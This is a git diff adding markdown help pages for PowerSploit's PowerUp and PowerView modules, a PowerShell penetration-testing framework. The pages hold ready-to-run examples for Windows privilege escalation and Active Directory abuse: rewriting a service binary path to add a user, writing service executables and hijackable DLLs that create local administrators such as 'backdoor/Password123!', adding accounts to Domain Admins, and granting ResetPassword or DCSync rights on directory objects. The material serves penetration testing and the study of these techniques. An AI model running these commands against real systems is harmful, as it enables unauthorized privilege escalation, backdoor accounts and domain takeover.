+Restore the original binary for the service 'VulnSVC'.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe'

+```

+

+Restore the original binary for the service 'VulnSVC' from a custom location.

+

+## PARAMETERS

+

+### -Name

+The service name to restore a binary for.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ServiceName

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -BackupPath

+Optional manual path to the backup binary.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.ServiceBinary.Installed

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Set-ServiceBinaryPath.md b/docs/Privesc/Set-ServiceBinaryPath.md
new file mode 100755
index 0000000..b39926f
--- /dev/null
+++ b/docs/Privesc/Set-ServiceBinaryPath.md
@@ -0,0 +1,92 @@
+# Set-ServiceBinaryPath

+

+## SYNOPSIS

+Sets the binary path for a service to a specified value.

+

+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect

+

+## SYNTAX

+

+```

+Set-ServiceBinaryPath [-Name] <String[]> [-Path] <String>

+```

+

+## DESCRIPTION

+Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a

+service handle to the service with ConfigControl access using the GetServiceHandle

+Win32 API call.

+ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath)

+to the string value specified by binPath, and the handle is closed off.

+

+Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a

+Dacl field to each object.

+It does this by opening a handle with ReadControl for the

+service with using the GetServiceHandle Win32 API call and then uses

+QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add'

+```

+

+Sets the binary path for 'VulnSvc' to be a command to add a user.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add'

+```

+

+Sets the binary path for 'VulnSvc' to be a command to add a user.

+

+## PARAMETERS

+

+### -Name

+An array of one or more service names to set the binary path for.

+Required.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: ServiceName

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Path

+The new binary path (lpBinaryPathName) to set for the specified service.

+Required.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: BinaryPath, binPath

+

+Required: True

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### System.Boolean

+

+$True if configuration succeeds, $False otherwise.

+

+## NOTES

+

+## RELATED LINKS

+

+[https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx)

+

diff --git a/docs/Privesc/Test-ServiceDaclPermission.md b/docs/Privesc/Test-ServiceDaclPermission.md
new file mode 100755
index 0000000..2251a11
--- /dev/null
+++ b/docs/Privesc/Test-ServiceDaclPermission.md
@@ -0,0 +1,112 @@
+# Test-ServiceDaclPermission

+

+## SYNOPSIS

+Tests one or more passed services or service names against a given permission set,

+returning the service objects where the current user have the specified permissions.

+

+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: Add-ServiceDacl

+

+## SYNTAX

+

+```

+Test-ServiceDaclPermission [-Name] <String[]> [-Permissions <String[]>] [-PermissionSet <String>]

+```

+

+## DESCRIPTION

+Takes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds

+a service Dacl to the service object with Add-ServiceDacl.

+All group SIDs for the current

+user are enumerated services where the user has some type of permission are filtered.

+The

+services are then filtered against a specified set of permissions, and services where the

+current user have the specified permissions are returned.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-Service | Test-ServiceDaclPermission

+```

+

+Return all service objects where the current user can modify the service configuration.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-Service | Test-ServiceDaclPermission -PermissionSet 'Restart'

+```

+

+Return all service objects that the current user can restart.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Test-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC'

+```

+

+Return the VulnSVC object if the current user has start permissions.

+

+## PARAMETERS

+

+### -Name

+An array of one or more service names to test against the specified permission set.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: ServiceName, Service

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Permissions

+A manual set of permission to test again.

+One of:'QueryConfig', 'ChangeConfig', 'QueryStatus',

+'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl',

+'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity',

+'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess'

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -PermissionSet

+A pre-defined permission set to test a specified service against.

+'ChangeConfig', 'Restart', or 'AllAccess'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: ChangeConfig

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### ServiceProcess.ServiceController

+

+## NOTES

+

+## RELATED LINKS

+

+[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)

+

diff --git a/docs/Privesc/Write-HijackDll.md b/docs/Privesc/Write-HijackDll.md
new file mode 100755
index 0000000..d38e3e7
--- /dev/null
+++ b/docs/Privesc/Write-HijackDll.md
@@ -0,0 +1,173 @@
+# Write-HijackDll

+

+## SYNOPSIS

+Patches in the path to a specified .bat (containing the specified command) into a

+pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Write-HijackDll [-DllPath] <String> [[-Architecture] <String>] [[-BatPath] <String>] [[-UserName] <String>]

+ [[-Password] <String>] [[-LocalGroup] <String>] [[-Credential] <PSCredential>] [[-Command] <String>]

+```

+

+## DESCRIPTION

+First builds a self-deleting .bat file that executes the specified -Command or local user,

+to add and writes the.bat out to -BatPath.

+The BatPath is then patched into a pre-compiled

+C++ DLL that is built to be hijackable by the IKEEXT service.

+There are two DLLs, one for

+x86 and one for x64, and both are contained as base64-encoded strings.

+The DLL is then

+written out to the specified OutputFile.

+

+## EXAMPLES

+

+### Example 1

+```

+PS C:\> {{ Add example code here }}

+```

+

+{{ Add example description here }}

+

+## PARAMETERS

+

+### -DllPath

+File name to write the generated DLL out to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Architecture

+The Architecture to generate for the DLL, x86 or x64.

+If not specified, PowerUp

+will try to automatically determine the correct architecture.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -BatPath

+Path to the .bat for the DLL to launch.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 3

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserName

+The \[domain\\\]username to add.

+If not given, it defaults to "john".

+Domain users are not created, only added to the specified localgroup.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 4

+Default value: John

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Password

+The password to set for the added user.

+If not given, it defaults to "Password123!"

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 5

+Default value: Password123!

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LocalGroup

+Local group name to add the user to (default of 'Administrators').

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 6

+Default value: Administrators

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object specifying the user/password to add.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 7

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Command

+Custom command to execute instead of user creation.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 8

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.HijackableDLL

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Write-ServiceBinary.md b/docs/Privesc/Write-ServiceBinary.md
new file mode 100755
index 0000000..7d588a5
--- /dev/null
+++ b/docs/Privesc/Write-ServiceBinary.md
@@ -0,0 +1,191 @@
+# Write-ServiceBinary

+

+## SYNOPSIS

+Patches in the specified command to a pre-compiled C# service executable and

+writes the binary out to the specified ServicePath location.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]

+ [-Credential <PSCredential>] [-Command <String>] [-Path <String>]

+```

+

+## DESCRIPTION

+Takes a pre-compiled C# service binary and patches in the appropriate commands needed

+for service abuse.

+If a -UserName/-Password or -Credential is specified, the command

+patched in creates a local user and adds them to the specified -LocalGroup, otherwise

+the specified -Command is patched in.

+The binary is then written out to the specified

+-ServicePath.

+Either -Name must be specified for the service, or a proper object from

+Get-Service must be passed on the pipeline in order to patch in the appropriate service

+name the binary will be running under.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Write-ServiceBinary -Name VulnSVC

+```

+

+Writes a service binary to service.exe in the local directory for VulnSVC that

+adds a local Administrator (john/Password123!).

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-Service VulnSVC | Write-ServiceBinary

+```

+

+Writes a service binary to service.exe in the local directory for VulnSVC that

+adds a local Administrator (john/Password123!).

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'

+```

+

+Writes a service binary to service.exe in the local directory for VulnSVC that adds

+TESTLAB\john to the Administrators local group.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!

+```

+

+Writes a service binary to service.exe in the local directory for VulnSVC that

+adds a local Administrator (backdoor/Password123!).

+

+### -------------------------- EXAMPLE 5 --------------------------

+```

+Write-ServiceBinary -Name VulnSVC -Command "net ..."

+```

+

+Writes a service binary to service.exe in the local directory for VulnSVC that

+executes a custom command.

+

+## PARAMETERS

+

+### -Name

+The service name the EXE will be running under.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ServiceName

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -UserName

+The \[domain\\\]username to add.

+If not given, it defaults to "john".

+Domain users are not created, only added to the specified localgroup.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: John

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Password

+The password to set for the added user.

+If not given, it defaults to "Password123!"

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Password123!

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LocalGroup

+Local group name to add the user to (default of 'Administrators').

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Administrators

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object specifying the user/password to add.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Command

+Custom command to execute instead of user creation.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Path

+Path to write the binary out to, defaults to 'service.exe' in the local directory.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: "$(Convert-Path .)\service.exe"

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.ServiceBinary

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Write-UserAddMSI.md b/docs/Privesc/Write-UserAddMSI.md
new file mode 100755
index 0000000..cac959d
--- /dev/null
+++ b/docs/Privesc/Write-UserAddMSI.md
@@ -0,0 +1,56 @@
+# Write-UserAddMSI

+

+## SYNOPSIS

+Writes out a precompiled MSI installer that prompts for a user/group addition.

+This function can be used to abuse Get-RegistryAlwaysInstallElevated.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Write-UserAddMSI [[-Path] <String>]

+```

+

+## DESCRIPTION

+Writes out a precompiled MSI installer that prompts for a user/group addition.

+This function can be used to abuse Get-RegistryAlwaysInstallElevated.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Write-UserAddMSI

+```

+

+Writes the user add MSI to the local directory.

+

+## PARAMETERS

+

+### -Path

+{{Fill Path Description}}

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ServiceName

+

+Required: False

+Position: 1

+Default value: UserAdd.msi

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.UserAddMSI

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/index.md b/docs/Privesc/index.md
new file mode 100644
index 0000000..836e674
--- /dev/null
+++ b/docs/Privesc/index.md
@@ -0,0 +1,55 @@
+## PowerUp
+
+PowerUp aims to be a clearinghouse of common Windows privilege escalation
+vectors that rely on misconfigurations.
+
+Running Invoke-AllChecks will output any identifiable vulnerabilities along
+with specifications for any abuse functions. The -HTMLReport flag will also
+generate a COMPUTER.username.html version of the report.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+
+### Token/Privilege Enumeration/Abuse:
+    Get-ProcessTokenGroup               -   returns all SIDs that the current token context is a part of, whether they are disabled or not
+    Get-ProcessTokenPrivilege           -   returns all privileges for the current (or specified) process ID
+    Enable-Privilege                    -   enables a specific privilege for the current process
+
+### Service Enumeration/Abuse:
+    Test-ServiceDaclPermission          -   tests one or more passed services or service names against a given permission set
+    Get-UnquotedService                 -   returns services with unquoted paths that also have a space in the name
+    Get-ModifiableServiceFile           -   returns services where the current user can write to the service binary path or its config
+    Get-ModifiableService               -   returns services the current user can modify
+    Get-ServiceDetail                   -   returns detailed information about a specified service
+    Set-ServiceBinaryPath               -   sets the binary path for a service to a specified value
+    Invoke-ServiceAbuse                 -   modifies a vulnerable service to create a local admin or execute a custom command
+    Write-ServiceBinary                 -   writes out a patched C# service binary that adds a local admin or executes a custom command
+    Install-ServiceBinary               -   replaces a service binary with one that adds a local admin or executes a custom command
+    Restore-ServiceBinary               -   restores a replaced service binary with the original executable
+
+### DLL Hijacking:
+    Find-ProcessDLLHijack               -   finds potential DLL hijacking opportunities for currently running processes
+    Find-PathDLLHijack                  -   finds service %PATH% DLL hijacking opportunities
+    Write-HijackDll                     -   writes out a hijackable DLL
+    
+### Registry Checks:
+    Get-RegistryAlwaysInstallElevated   -   checks if the AlwaysInstallElevated registry key is set
+    Get-RegistryAutoLogon               -   checks for Autologon credentials in the registry
+    Get-ModifiableRegistryAutoRun       -   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns
+
+### Miscellaneous Checks:
+    Get-ModifiableScheduledTaskFile     -   find schtasks with modifiable target files
+    Get-UnattendedInstallFile           -   finds remaining unattended installation files
+    Get-Webconfig                       -   checks for any encrypted web.config strings
+    Get-ApplicationHost                 -   checks for encrypted application pool and virtual directory passwords
+    Get-SiteListPassword                -   retrieves the plaintext passwords for any found McAfee's SiteList.xml files
+    Get-CachedGPPPassword               -   checks for passwords in cached Group Policy Preferences files
+
+### Other Helpers/Meta-Functions:
+    Get-ModifiablePath                  -   tokenizes an input string and returns the files in it the current user can modify
+    Write-UserAddMSI                    -   write out a MSI installer that prompts for a user to be added
+    Invoke-WScriptUACBypass             -   performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe
+    Invoke-PrivescAudit                 -   runs all current escalation checks and returns a report (formerly Invoke-AllChecks)
diff --git a/docs/Recon/Add-DomainGroupMember.md b/docs/Recon/Add-DomainGroupMember.md
new file mode 100755
index 0000000..cc563e9
--- /dev/null
+++ b/docs/Recon/Add-DomainGroupMember.md
@@ -0,0 +1,142 @@
+# Add-DomainGroupMember

+

+## SYNOPSIS

+Adds a domain user (or group) to an existing domain group, assuming

+appropriate permissions to do so.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-PrincipalContext

+

+## SYNTAX

+

+```

+Add-DomainGroupMember [-Identity] <String> -Members <String[]> [-Domain <String>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+First binds to the specified domain context using Get-PrincipalContext.

+The bound domain context is then used to search for the specified -GroupIdentity,

+which returns a DirectoryServices.AccountManagement.GroupPrincipal object.

+For

+each entry in -Members, each member identity is similarly searched for and added

+to the group.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'

+```

+

+Adds harmj0y to 'Domain Admins' in the current domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred

+

+Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred

+

+Creates the 'andy' user with the specified description and password, using the specified

+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember

+and the alternate credentials.

+

+## PARAMETERS

+

+### -Identity

+A group SamAccountName (e.g.

+Group1), DistinguishedName (e.g.

+CN=group1,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)

+specifying the group to add members to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: GroupName, GroupIdentity

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Members

+One or more member identities, i.e.

+SamAccountName (e.g.

+Group1), DistinguishedName

+(e.g.

+CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1114),

+or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202).

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: MemberIdentity, Member, DistinguishedName

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use to search for user/group principals, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

+[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)

+

diff --git a/docs/Recon/Add-DomainObjectAcl.md b/docs/Recon/Add-DomainObjectAcl.md
new file mode 100755
index 0000000..c530e81
--- /dev/null
+++ b/docs/Recon/Add-DomainObjectAcl.md
@@ -0,0 +1,361 @@
+# Add-DomainObjectAcl

+

+## SYNOPSIS

+Adds an ACL for a specific active directory object.

+

+AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainObject

+

+## SYNTAX

+

+```

+Add-DomainObjectAcl [[-TargetIdentity] <String[]>] [-TargetDomain <String>] [-TargetLDAPFilter <String>]

+ [-TargetSearchBase <String>] -PrincipalIdentity <String[]> [-PrincipalDomain <String>] [-Server <String>]

+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]

+ [-Credential <PSCredential>] [-Rights <String>] [-RightsGUID <Guid>]

+```

+

+## DESCRIPTION

+This function modifies the ACL/ACE entries for a given Active Directory

+target object specified by -TargetIdentity.

+Available -Rights are

+'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended

+rights GUID can be set with -RightsGUID.

+These rights are granted on the target

+object for the specified -PrincipalIdentity.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid

+```

+

+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}

+

+...

+

+Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string:(&(|(samAccountName=dfm.a)))

+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local

+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local

+

+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }

+

+AceQualifier           : AccessAllowed

+ObjectDN               : CN=dfm (admin),CN=Users,DC=testlab,DC=local

+ActiveDirectoryRights  : ExtendedRight

+ObjectAceType          : User-Force-Change-Password

+ObjectSID              : S-1-5-21-890171859-3433809279-3366196753-1114

+InheritanceFlags       : None

+BinaryLength           : 56

+AceType                : AccessAllowedObject

+ObjectAceFlags         : ObjectAceTypePresent

+IsCallback             : False

+PropagationFlags       : None

+SecurityIdentifier     : S-1-5-21-890171859-3433809279-3366196753-1108

+AccessMask             : 256

+AuditFlags             : None

+IsInherited            : False

+AceFlags               : None

+InheritedObjectAceType : All

+OpaqueLength           : 0

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid

+```

+

+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}

+

+\[no results returned\]

+

+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose

+VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain

+VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection

+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y))))

+VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain

+VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection

+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))

+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local

+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local

+

+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }

+

+AceQualifier           : AccessAllowed

+ObjectDN               : CN=dfm (admin),CN=Users,DC=testlab,DC=local

+ActiveDirectoryRights  : ExtendedRight

+ObjectAceType          : User-Force-Change-Password

+ObjectSID              : S-1-5-21-890171859-3433809279-3366196753-1114

+InheritanceFlags       : None

+BinaryLength           : 56

+AceType                : AccessAllowedObject

+ObjectAceFlags         : ObjectAceTypePresent

+IsCallback             : False

+PropagationFlags       : None

+SecurityIdentifier     : S-1-5-21-890171859-3433809279-3366196753-1108

+AccessMask             : 256

+AuditFlags             : None

+IsInherited            : False

+AceFlags               : None

+InheritedObjectAceType : All

+OpaqueLength           : 0

+

+## PARAMETERS

+

+### -TargetIdentity

+A SamAccountName (e.g.

+harmj0y), DistinguishedName (e.g.

+CN=harmj0y,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)

+for the domain object to modify ACLs for.

+Required.

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DistinguishedName, SamAccountName, Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -TargetDomain

+Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -TargetLDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory object targets.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -TargetSearchBase

+The LDAP source to search through for targets, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -PrincipalIdentity

+A SamAccountName (e.g.

+harmj0y), DistinguishedName (e.g.

+CN=harmj0y,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)

+for the domain principal to add for the ACL.

+Required.

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -PrincipalDomain

